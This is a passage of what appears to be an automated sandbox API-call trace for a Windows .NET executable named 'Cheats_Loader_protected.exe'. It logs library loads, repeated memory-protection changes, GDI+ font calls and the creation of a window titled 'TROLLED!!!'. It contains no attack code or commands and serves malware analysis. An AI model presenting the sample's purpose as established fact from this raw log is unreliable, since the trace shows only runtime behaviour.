ProcessHandle=0xffffffff, BaseAddress=0x13fd9dc*=0x6faf63e4, NumberOfBytesToProtect=0x13fd9e0, NewAccessProtection=0x2, OldAccessProtection=0x13fda14 | out: BaseAddress=0x13fd9dc*=0x6faf6000, NumberOfBytesToProtect=0x13fd9e0, OldAccessProtection=0x13fda14*=0x4) returned 0x0 [0067.253] SetLastError (dwErrCode=0x0) [0067.253] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdiplusStartup") returned 0x6fa1f300 [0067.254] GdiplusStartup (in: token=0x755f70, input=0x13fe628, output=0x13fe678 | out: token=0x755f70, output=0x13fe678) returned 0x0 [0067.265] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdipCreateFontFromLogfontW") returned 0x6fa1a070 [0067.265] SysReAllocStringLen (in: pbstr=0x13fe49c*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x13fe49c*="ole32.dll") returned 1 [0067.265] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0067.265] LoadLibraryExW (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x753c0000 [0067.265] GetLastError () returned 0x0 [0067.266] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0067.266] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0067.266] GetModuleFileNameA (in: hModule=0x753c0000, lpFilename=0x13fe380, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0067.266] GetCurrentProcess () returned 0xffffffff [0067.266] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe484*=0x7548c820, NumberOfBytesToProtect=0x13fe488, NewAccessProtection=0x4, OldAccessProtection=0x13fe4bc | out: BaseAddress=0x13fe484*=0x7548c000, NumberOfBytesToProtect=0x13fe488, OldAccessProtection=0x13fe4bc*=0x2) returned 0x0 [0067.266] GetCurrentProcess () returned 0xffffffff [0067.266] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe484*=0x7548c820, NumberOfBytesToProtect=0x13fe488, NewAccessProtection=0x2, OldAccessProtection=0x13fe4bc | out: BaseAddress=0x13fe484*=0x7548c000, NumberOfBytesToProtect=0x13fe488, OldAccessProtection=0x13fe4bc*=0x4) returned 0x0 [0067.266] GetCurrentProcess () returned 0xffffffff [0067.266] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe484*=0x7548c828, NumberOfBytesToProtect=0x13fe488, NewAccessProtection=0x4, OldAccessProtection=0x13fe4bc | out: BaseAddress=0x13fe484*=0x7548c000, NumberOfBytesToProtect=0x13fe488, OldAccessProtection=0x13fe4bc*=0x2) returned 0x0 [0067.267] GetCurrentProcess () returned 0xffffffff [0067.267] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe484*=0x7548c828, NumberOfBytesToProtect=0x13fe488, NewAccessProtection=0x2, OldAccessProtection=0x13fe4bc | out: BaseAddress=0x13fe484*=0x7548c000, NumberOfBytesToProtect=0x13fe488, OldAccessProtection=0x13fe4bc*=0x4) returned 0x0 [0067.267] SetLastError (dwErrCode=0x0) [0067.267] GetProcAddress (hModule=0x753c0000, lpProcName="CoTaskMemAlloc") returned 0x749b7d40 [0067.267] CoTaskMemAlloc (cb=0x5c) returned 0x78f98 [0067.269] GdipCreateFontFromLogfontW (hdc=0x10105d6, logfont=0x78f98, font=0x13ff138) returned 0x0 [0067.828] GetProcAddress (hModule=0x753c0000, lpProcName="CoTaskMemFree") returned 0x749b64b0 [0067.828] CoTaskMemFree (pv=0x78f98) [0067.828] SysReAllocStringLen (in: pbstr=0x13fe4a4*=0x0, psz="mscoree.dll", len=0xb | out: pbstr=0x13fe4a4*="mscoree.dll") returned 1 [0067.828] CharLowerBuffW (in: lpsz="mscoree.dll", cchLength=0xb | out: lpsz="mscoree.dll") returned 0xb [0067.829] LoadLibraryExW (lpLibFileName="mscoree.dll", hFile=0x0, dwFlags=0x0) returned 0x74270000 [0067.829] GetLastError () returned 0x0 [0067.829] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0067.829] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0067.829] GetModuleFileNameA (in: hModule=0x74270000, lpFilename=0x13fe388, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\SYSTEM32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")) returned 0x1f [0067.830] GetCurrentProcess () returned 0xffffffff [0067.830] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd010, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x4, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x2) returned 0x0 [0067.830] GetCurrentProcess () returned 0xffffffff [0067.830] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd010, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x2, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x4) returned 0x0 [0067.830] GetCurrentProcess () returned 0xffffffff [0067.830] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd018, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x4, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x2) returned 0x0 [0067.831] GetCurrentProcess () returned 0xffffffff [0067.831] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd018, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x2, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x4) returned 0x0 [0067.831] GetCurrentProcess () returned 0xffffffff [0067.831] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd03c, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x4, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x2) returned 0x0 [0067.831] GetCurrentProcess () returned 0xffffffff [0067.831] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd03c, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x2, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x4) returned 0x0 [0067.832] GetCurrentProcess () returned 0xffffffff [0067.832] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd054, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x4, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x2) returned 0x0 [0067.832] GetCurrentProcess () returned 0xffffffff [0067.832] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd054, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x2, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x4) returned 0x0 [0067.832] GetCurrentProcess () returned 0xffffffff [0067.832] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd06c, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x4, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x2) returned 0x0 [0067.833] GetCurrentProcess () returned 0xffffffff [0067.833] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd06c, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x2, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x4) returned 0x0 [0067.833] GetCurrentProcess () returned 0xffffffff [0067.833] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd090, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x4, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x2) returned 0x0 [0067.833] GetCurrentProcess () returned 0xffffffff [0067.833] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd090, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x2, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x4) returned 0x0 [0067.834] GetCurrentProcess () returned 0xffffffff [0067.834] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd13c, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x4, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x2) returned 0x0 [0067.834] GetCurrentProcess () returned 0xffffffff [0067.834] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd13c, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x2, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x4) returned 0x0 [0067.834] GetCurrentProcess () returned 0xffffffff [0067.834] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd150, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x4, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x2) returned 0x0 [0067.835] GetCurrentProcess () returned 0xffffffff [0067.835] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd150, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x2, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x4) returned 0x0 [0067.835] GetCurrentProcess () returned 0xffffffff [0067.835] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd1a8, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x4, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x2) returned 0x0 [0067.835] GetCurrentProcess () returned 0xffffffff [0067.835] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe48c*=0x742bd1a8, NumberOfBytesToProtect=0x13fe490, NewAccessProtection=0x2, OldAccessProtection=0x13fe4c4 | out: BaseAddress=0x13fe48c*=0x742bd000, NumberOfBytesToProtect=0x13fe490, OldAccessProtection=0x13fe4c4*=0x4) returned 0x0 [0067.836] SetLastError (dwErrCode=0x0) [0067.836] GetProcAddress (hModule=0x74270000, lpProcName="ND_RI2") returned 0x742843e0 [0067.902] CoTaskMemAlloc (cb=0x5c) returned 0x78d28 [0067.902] GetProcAddress (hModule=0x74150000, lpProcName="ND_RI2_RetAddr") returned 0x0 [0067.902] GetProcAddress (hModule=0x74150000, lpProcName="ND_RI2") returned 0x74160dc0 [0067.902] CoTaskMemFree (pv=0x78d28) [0067.902] GetProcAddress (hModule=0x74270000, lpProcName="ND_RU1") returned 0x74284300 [0067.902] CoTaskMemAlloc (cb=0x5c) returned 0x78d28 [0067.903] GetProcAddress (hModule=0x74150000, lpProcName="ND_RU1_RetAddr") returned 0x0 [0067.903] GetProcAddress (hModule=0x74150000, lpProcName="ND_RU1") returned 0x74160de0 [0067.903] CoTaskMemFree (pv=0x78d28) [0067.903] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdipGetFontUnit") returned 0x6fa1a340 [0067.903] GdipGetFontUnit (font=0x5ab1f08, unit=0x13ff100) returned 0x0 [0067.904] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdipGetFontSize") returned 0x6fa199a0 [0067.904] GdipGetFontSize (font=0x5ab1f08, size=0x13ff104) returned 0x0 [0067.904] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdipGetFontStyle") returned 0x6fa1a3d0 [0067.904] GdipGetFontStyle (font=0x5ab1f08, style=0x13ff0fc) returned 0x0 [0067.904] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdipGetFamily") returned 0x6fa1a460 [0067.904] GdipGetFamily (font=0x5ab1f08, family=0x13ff0f8) returned 0x0 [0067.905] GdipGetFontSize (font=0x5ab1f08, size=0x3736238) returned 0x0 [0067.905] GetProcAddress (hModule=0x750c0000, lpProcName="ReleaseDC") returned 0x743ba2f0 [0067.905] ReleaseDC (hWnd=0x0, hDC=0x10105d6) returned 1 [0067.905] GetDC (hWnd=0x0) returned 0x60100ce [0067.906] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdipCreateFromHDC") returned 0x6fa10350 [0067.906] GdipCreateFromHDC (hdc=0x60100ce, graphics=0x13ff114) returned 0x0 [0067.912] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdipGetDpiY") returned 0x6fa1a1d0 [0067.912] GdipGetDpiY (graphics=0x6ccf260, dpi=0x3736314) returned 0x0 [0067.912] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdipGetFontHeight") returned 0x6fa198c0 [0067.913] GdipGetFontHeight (font=0x5ab1f08, graphics=0x6ccf260, height=0x13ff10c) returned 0x0 [0067.913] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdipGetEmHeight") returned 0x6fa0ee10 [0067.913] GdipGetEmHeight (family=0x5ab8980, style=0, EmHeight=0x13ff114) returned 0x0 [0067.913] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdipGetLineSpacing") returned 0x6fa0ed90 [0067.913] GdipGetLineSpacing (family=0x5ab8980, style=0, LineSpacing=0x13ff114) returned 0x0 [0067.913] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdipDeleteGraphics") returned 0x6f9f0720 [0067.914] GdipDeleteGraphics (graphics=0x6ccf260) returned 0x0 [0067.914] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0067.914] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdipCreateFont") returned 0x6fa0eb20 [0067.914] GdipCreateFont (fontFamily=0x5ab8980, emSize=0x41040000, style=0, unit=0x3, font=0x3736330) returned 0x0 [0067.914] GdipGetFontSize (font=0x5abef48, size=0x3736334) returned 0x0 [0067.915] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdipDeleteFont") returned 0x6fa19d70 [0067.915] GdipDeleteFont (font=0x5ab1f08) returned 0x0 [0067.915] GetDC (hWnd=0x0) returned 0x60100ce [0067.915] GdipCreateFromHDC (hdc=0x60100ce, graphics=0x13ff148) returned 0x0 [0067.916] GetProcAddress (hModule=0x6f9b0000, lpProcName="GdipGetLogFontW") returned 0x6fa489c0 [0067.916] CoTaskMemAlloc (cb=0x5c) returned 0x788b0 [0067.917] GdipGetLogFontW (font=0x5abef48, graphics=0x6ccf260, logfontW=0x788b0) returned 0x0 [0067.920] CoTaskMemFree (pv=0x788b0) [0067.920] CoTaskMemAlloc (cb=0x5c) returned 0x78f98 [0067.920] CoTaskMemFree (pv=0x78f98) [0067.921] GetProcAddress (hModule=0x74270000, lpProcName="ND_WU1") returned 0x74284680 [0067.921] CoTaskMemAlloc (cb=0x5c) returned 0x78d28 [0067.921] GetProcAddress (hModule=0x74150000, lpProcName="ND_WU1_RetAddr") returned 0x0 [0067.921] GetProcAddress (hModule=0x74150000, lpProcName="ND_WU1") returned 0x74160e00 [0067.921] CoTaskMemFree (pv=0x78d28) [0067.921] GdipDeleteGraphics (graphics=0x6ccf260) returned 0x0 [0067.921] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0067.922] GetProcAddress (hModule=0x74910000, lpProcName="CreateFontIndirect") returned 0x0 [0067.922] GetProcAddress (hModule=0x74910000, lpProcName="CreateFontIndirectW") returned 0x74916730 [0067.922] CoTaskMemAlloc (cb=0x5c) returned 0x78d28 [0067.922] CreateFontIndirectW (lplf=0x78d28) returned 0x4c0a077d [0067.922] CoTaskMemFree (pv=0x78d28) [0067.922] GetProcAddress (hModule=0x74910000, lpProcName="SelectObject") returned 0x74916460 [0067.922] SelectObject (hdc=0xa3010527, h=0x4c0a077d) returned 0x8a01c2 [0067.923] GetProcAddress (hModule=0x74910000, lpProcName="GetTextMetricsW") returned 0x749175b0 [0067.923] GetTextMetricsW (in: hdc=0xa3010527, lptm=0x13ff254 | out: lptm=0x13ff254) returned 1 [0067.924] GetProcAddress (hModule=0x74910000, lpProcName="GetTextExtentPoint32W") returned 0x74913440 [0067.924] GetTextExtentPoint32W (in: hdc=0xa3010527, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x373655c | out: psizl=0x373655c) returned 1 [0067.926] SelectObject (hdc=0xa3010527, h=0x8a01c2) returned 0x4c0a077d [0067.927] GetProcAddress (hModule=0x74910000, lpProcName="DeleteDC") returned 0x74915870 [0067.928] DeleteDC (hdc=0xa3010527) returned 1 [0067.929] SysReAllocStringLen (in: pbstr=0x13fefcc*=0x0, psz="comctl32.dll", len=0xc | out: pbstr=0x13fefcc*="comctl32.dll") returned 1 [0067.929] CharLowerBuffW (in: lpsz="comctl32.dll", cchLength=0xc | out: lpsz="comctl32.dll") returned 0xc [0067.929] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x741e0000 [0067.929] AdjustWindowRectEx (in: lpRect=0x13fefbc, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x13fefbc) returned 1 [0067.929] AdjustWindowRectEx (in: lpRect=0x13ff1e0, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x13ff1e0) returned 1 [0067.930] SysReAllocStringLen (in: pbstr=0x13fef44*=0x0, psz="comctl32.dll", len=0xc | out: pbstr=0x13fef44*="comctl32.dll") returned 1 [0067.930] CharLowerBuffW (in: lpsz="comctl32.dll", cchLength=0xc | out: lpsz="comctl32.dll") returned 0xc [0067.930] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x741e0000 [0067.930] AdjustWindowRectEx (in: lpRect=0x13fef34, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x13fef34) returned 1 [0067.930] AdjustWindowRectEx (in: lpRect=0x13ff018, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x13ff018) returned 1 [0067.931] GetSystemMetrics (nIndex=34) returned 136 [0067.931] GetSystemMetrics (nIndex=35) returned 39 [0067.931] GetCurrentActCtx (in: lphActCtx=0x13ff358 | out: lphActCtx=0x13ff358*=0x0) returned 1 [0067.931] ActivateActCtx (in: hActCtx=0xb823c, lpCookie=0x13ff368 | out: hActCtx=0xb823c, lpCookie=0x13ff368) returned 1 [0067.931] GetCurrentActCtx (in: lphActCtx=0x13ff178 | out: lphActCtx=0x13ff178*=0xb823c) returned 1 [0067.932] SysReAllocStringLen (in: pbstr=0x13ff0e8*=0x0, psz="comctl32.dll", len=0xc | out: pbstr=0x13ff0e8*="comctl32.dll") returned 1 [0067.932] CharLowerBuffW (in: lpsz="comctl32.dll", cchLength=0xc | out: lpsz="comctl32.dll") returned 0xc [0067.932] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6fb20000 [0067.932] AdjustWindowRectEx (in: lpRect=0x13ff0d8, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x13ff0d8) returned 1 [0067.932] CreateWindowExW (dwExStyle=0x50000, lpClassName="WindowsForms10.Window.8.app.0.1ca0192_r35_ad1", lpWindowName="TROLLED!!!", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=471, nHeight=291, hWndParent=0x0, hMenu=0x0, hInstance=0xa90000, lpParam=0x0) returned 0x302c8 [0067.933] SetWindowLongW (hWnd=0x302c8, nIndex=-4, dwNewLong=1950089536) returned 10880446 [0067.933] GetWindowLongW (hWnd=0x302c8, nIndex=-4) returned 1950089536 [0067.933] SetWindowLongW (hWnd=0x302c8, nIndex=-4, dwNewLong=10880526) returned 1950089536 [0067.933] GetWindowLongW (hWnd=0x302c8, nIndex=-4) returned 10880526 [0067.933] GetWindowLongW (hWnd=0x302c8, nIndex=-16) returned 114229248 [0067.933] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x81, wParam=0x0, lParam=0x13feb98) returned 0x1 [0067.937] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x83, wParam=0x0, lParam=0x13feb84) returned 0x0 [0067.938] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x1, wParam=0x0, lParam=0x13feb98) returned 0x0 [0067.938] GetClientRect (in: hWnd=0x302c8, lpRect=0x13fe850 | out: lpRect=0x13fe850) returned 1 [0067.938] GetWindowRect (in: hWnd=0x302c8, lpRect=0x13fe850 | out: lpRect=0x13fe850) returned 1 [0067.938] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowText") returned 0x0 [0067.938] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowTextW") returned 0x750cd0c0 [0067.939] SetWindowTextW (hWnd=0x302c8, lpString="TROLLED!!!") returned 1 [0067.939] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0xc, wParam=0x0, lParam=0x3735ba4) returned 0x1 [0067.947] GetProcAddress (hModule=0x750c0000, lpProcName="GetProcessWindowStation") returned 0x750f3600 [0067.948] GetProcAddress (hModule=0x750c0000, lpProcName="GetUserObjectInformation") returned 0x0 [0067.948] GetProcAddress (hModule=0x750c0000, lpProcName="GetUserObjectInformationA") returned 0x750e34f0 [0067.949] GetUserObjectInformationA (in: hObj=0xe4, nIndex=1, pvInfo=0x3736a78, nLength=0xc, lpnLengthNeeded=0x13fe748 | out: pvInfo=0x3736a78, lpnLengthNeeded=0x13fe748) returned 1 [0067.951] GetProcAddress (hModule=0x772d0000, lpProcName="SetConsoleCtrlHandler") returned 0x7733f4d0 [0067.953] GetProcAddress (hModule=0x772d0000, lpProcName="SetConsoleCtrlHandlerW") returned 0x0 [0067.955] SetConsoleCtrlHandler (HandlerRoutine=0xa60636, Add=1) returned 1 [0067.958] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandle") returned 0x0 [0067.960] GetProcAddress (hModule=0x750c0000, lpProcName="GetClassInfo") returned 0x0 [0067.960] GetProcAddress (hModule=0x750c0000, lpProcName="GetClassInfoW") returned 0x750e8450 [0067.960] GetClassInfoW (in: hInstance=0xa90000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.1ca0192.0", lpWndClass=0x3736adc | out: lpWndClass=0x3736adc) returned 0 [0067.994] GetProcAddress (hModule=0x750c0000, lpProcName="RegisterClass") returned 0x0 [0067.995] GetProcAddress (hModule=0x750c0000, lpProcName="RegisterClassW") returned 0x750e8720 [0067.996] CoTaskMemAlloc (cb=0x58) returned 0xb50a8 [0067.996] RegisterClassW (lpWndClass=0x13fe698) returned 0xc1a2 [0067.996] CoTaskMemFree (pv=0xb50a8) [0067.997] GetProcAddress (hModule=0x750c0000, lpProcName="CreateWindowEx") returned 0x0 [0067.997] GetProcAddress (hModule=0x750c0000, lpProcName="CreateWindowExW") returned 0x750e8780 [0067.998] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.1ca0192.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.1ca0192.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xa90000, lpParam=0x0) returned 0x6013e [0067.998] GetProcAddress (hModule=0x750c0000, lpProcName="DefWindowProc") returned 0x0 [0067.998] GetProcAddress (hModule=0x750c0000, lpProcName="DefWindowProcW") returned 0x743c0140 [0067.999] DefWindowProcW (hWnd=0x6013e, Msg=0x83, wParam=0x0, lParam=0x13fe1c4) returned 0x0 [0068.000] DefWindowProcW (hWnd=0x6013e, Msg=0x1, wParam=0x0, lParam=0x13fe1d8) returned 0x0 [0068.000] DefWindowProcW (hWnd=0x6013e, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0068.000] DefWindowProcW (hWnd=0x6013e, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0068.007] GetProcAddress (hModule=0x772d0000, lpProcName="GetStartupInfo") returned 0x0 [0068.010] GetProcAddress (hModule=0x772d0000, lpProcName="GetStartupInfoW") returned 0x772e5320 [0068.010] GetStartupInfoW (in: lpStartupInfo=0x3736f48 | out: lpStartupInfo=0x3736f48*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0068.012] GetParent (hWnd=0x302c8) returned 0x0 [0068.012] SetWindowLongW (hWnd=0x302c8, nIndex=-8, dwNewLong=0) returned 0 [0068.022] GetProcAddress (hModule=0x750c0000, lpProcName="GetSystemMetrics") returned 0x750eddc0 [0068.022] GetSystemMetrics (nIndex=11) returned 32 [0068.022] GetSystemMetrics (nIndex=12) returned 32 [0068.022] GetDC (hWnd=0x0) returned 0x60100ce [0068.022] GetProcAddress (hModule=0x74910000, lpProcName="GetDeviceCaps") returned 0x743c0060 [0068.022] GetDeviceCaps (hdc=0x60100ce, index=12) returned 32 [0068.023] GetDeviceCaps (hdc=0x60100ce, index=14) returned 1 [0068.023] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0068.023] GetProcAddress (hModule=0x750c0000, lpProcName="CreateIconFromResourceEx") returned 0x750dd670 [0068.023] CreateIconFromResourceEx (presbits=0x37399a8, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x401ed [0068.025] GetSystemMetrics (nIndex=49) returned 16 [0068.025] GetSystemMetrics (nIndex=50) returned 16 [0068.025] CreateIconFromResourceEx (presbits=0x373aa8c, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x70213 [0068.029] GetProcAddress (hModule=0x750c0000, lpProcName="SendMessage") returned 0x0 [0068.029] GetProcAddress (hModule=0x750c0000, lpProcName="SendMessageW") returned 0x750d07d0 [0068.029] SendMessageW (hWnd=0x302c8, Msg=0x80, wParam=0x0, lParam=0x70213) returned 0x0 [0068.029] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x80, wParam=0x0, lParam=0x70213) returned 0x0 [0068.030] SendMessageW (hWnd=0x302c8, Msg=0x80, wParam=0x1, lParam=0x401ed) returned 0x0 [0068.030] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x80, wParam=0x1, lParam=0x401ed) returned 0x0 [0068.031] GetProcAddress (hModule=0x750c0000, lpProcName="GetSystemMenu") returned 0x750f3680 [0068.031] GetSystemMenu (hWnd=0x302c8, bRevert=0) returned 0x1410089 [0068.033] GetProcAddress (hModule=0x750c0000, lpProcName="GetWindowPlacement") returned 0x750f3750 [0068.033] GetWindowPlacement (in: hWnd=0x302c8, lpwndpl=0x13ff188 | out: lpwndpl=0x13ff188) returned 1 [0068.034] GetProcAddress (hModule=0x750c0000, lpProcName="EnableMenuItem") returned 0x750cb1b0 [0068.034] EnableMenuItem (hMenu=0x1410089, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0068.034] EnableMenuItem (hMenu=0x1410089, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0068.034] EnableMenuItem (hMenu=0x1410089, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0068.034] EnableMenuItem (hMenu=0x1410089, uIDEnableItem=0xf120, uEnable=0x1) returned 0 [0068.034] EnableMenuItem (hMenu=0x1410089, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0068.034] GetProcAddress (hModule=0x750c0000, lpProcName="GetClientRect") returned 0x750d9650 [0068.034] GetClientRect (in: hWnd=0x302c8, lpRect=0x13ff1cc | out: 